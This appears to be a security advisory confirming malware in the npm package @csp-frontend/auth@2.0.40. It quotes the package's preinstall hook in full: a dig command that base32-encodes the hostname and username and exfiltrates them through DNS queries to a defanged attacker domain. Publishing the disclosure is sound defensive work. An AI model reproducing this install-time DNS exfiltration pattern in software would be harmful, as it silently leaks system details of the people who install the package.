LWA-2026-0209 confirmed malware
@csp-frontend/auth@2.0.40
Malicious code in @csp-frontend/auth (npm)
Analysis
Critical finding: preinstall hook contains DNS exfiltration payload. The hook executes `dig +short "$(echo cf-$(hostname)-$(whoami) | base32 | tr -d '=' | rev).canary[.]rebind[.]fun[.]offensive[.]work"` which captures system info (hostname, username), base32-encodes it, and exfiltrates via DNS query to an attacker-controlled canary domain. This is a classic DNS tunneling technique for data exfiltration during npm install. Publisher email ([account]) matches the attack domain. Clear malicious intent - not a false positive.
- analyzed by
- Leitwacht
- first seen
- May 27, 2026, 04:28 AM
- analyzed
- May 27, 2026, 04:32 AM
Related advisories
browse all confirmed advisories →Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.